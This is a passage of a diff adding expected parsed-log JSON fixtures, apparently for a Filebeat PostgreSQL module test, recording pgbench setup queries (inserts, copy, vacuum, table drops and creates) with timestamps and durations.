(1,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.744 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.745Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 304000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2121, + "message": "2021-03-17 15:18:02.745 UTC [151] postgres@accounts LOG: duration: 0.304 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.745 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.745Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2198, + "message": "2021-03-17 15:18:02.745 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.745 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1510000, + "event.kind": "event", + "event.module": 
"postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2328, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 1.510 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2405, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 94000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2535, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.094 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", 
+ "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2612, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 56000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2742, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.056 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2819, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into 
pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 52000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2949, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.052 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3026, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 51000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + 
"input.type": "log", + "log.level": "LOG", + "log.offset": 3156, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.051 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3233, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 51000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3363, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.051 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": 
"event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3440, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 50000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3570, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.050 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3647, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", 
+ "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 52000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3777, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.052 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3854, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 52000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3985, + "message": "2021-03-17 15:18:02.747 UTC 
[151] postgres@accounts LOG: duration: 0.052 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4062, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: copy pgbench_accounts from stdin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "copy pgbench_accounts from stdin", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.987Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 239763008, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4164, + "message": "2021-03-17 15:18:02.987 UTC [151] postgres@accounts LOG: duration: 239.763 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.987 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.987Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": 
"LOG", + "log.offset": 4243, + "message": "2021-03-17 15:18:02.987 UTC [151] postgres@accounts LOG: statement: commit", + "postgresql.log.database": "accounts", + "postgresql.log.query": "commit", + "postgresql.log.timestamp": "2021-03-17 15:18:02.987 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.054Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 67302000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4319, + "message": "2021-03-17 15:18:03.054 UTC [151] postgres@accounts LOG: duration: 67.302 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.054 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.057Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4397, + "message": "2021-03-17 15:18:03.057 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:18:03.057 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.073Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 15246000, + "event.kind": "event", + "event.module": 
"postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4498, + "message": "2021-03-17 15:18:03.073 UTC [151] postgres@accounts LOG: duration: 15.246 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.073 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.073Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4576, + "message": "2021-03-17 15:18:03.073 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:03.073 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.076Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3531000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4676, + "message": "2021-03-17 15:18:03.076 UTC [151] postgres@accounts LOG: duration: 3.531 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.076 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.077Z", + "event.category": [ + "database" + ], + 
"event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4753, + "message": "2021-03-17 15:18:03.077 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.077 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.157Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 80735000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4854, + "message": "2021-03-17 15:18:03.157 UTC [151] postgres@accounts LOG: duration: 80.735 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.157 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.158Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4932, + "message": "2021-03-17 15:18:03.158 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_history", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_history", + "postgresql.log.timestamp": "2021-03-17 15:18:03.158 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + 
"service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.159Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 893000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5032, + "message": "2021-03-17 15:18:03.159 UTC [151] postgres@accounts LOG: duration: 0.893 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.159 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.159Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5109, + "message": "2021-03-17 15:18:03.159 UTC [151] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_branches add primary key (bid)", + "postgresql.log.timestamp": "2021-03-17 15:18:03.159 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 5266000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5229, + "message": "2021-03-17 15:18:03.165 UTC [151] postgres@accounts LOG: duration: 5.266 ms", + "postgresql.log.database": 
"accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.165 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5306, + "message": "2021-03-17 15:18:03.165 UTC [151] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_tellers add primary key (tid)", + "postgresql.log.timestamp": "2021-03-17 15:18:03.165 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.168Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2807000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5425, + "message": "2021-03-17 15:18:03.168 UTC [151] postgres@accounts LOG: duration: 2.807 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.168 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.168Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5502, + "message": 
"2021-03-17 15:18:03.168 UTC [151] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_accounts add primary key (aid)", + "postgresql.log.timestamp": "2021-03-17 15:18:03.168 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.249Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 81593000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5622, + "message": "2021-03-17 15:18:03.249 UTC [151] postgres@accounts LOG: duration: 81.593 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.249 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.110Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5700, + "message": "2021-03-17 15:18:04.110 UTC [154] postgres@accounts LOG: statement: drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:04.110 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": 
"2021-03-17T15:18:04.130Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 20521000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5859, + "message": "2021-03-17 15:18:04.130 UTC [154] postgres@accounts LOG: duration: 20.521 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.130 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.132Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5937, + "message": "2021-03-17 15:18:04.132 UTC [154] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.timestamp": "2021-03-17 15:18:04.132 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.143Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 11098000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6105, + "message": "2021-03-17 15:18:04.143 UTC [154] postgres@accounts LOG: duration: 11.098 ms", + 
"postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.143 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.143Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6183, + "message": "2021-03-17 15:18:04.143 UTC [154] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.143 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.152Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 8950000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6358, + "message": "2021-03-17 15:18:04.152 UTC [154] postgres@accounts LOG: duration: 8.950 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.152 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.152Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + 
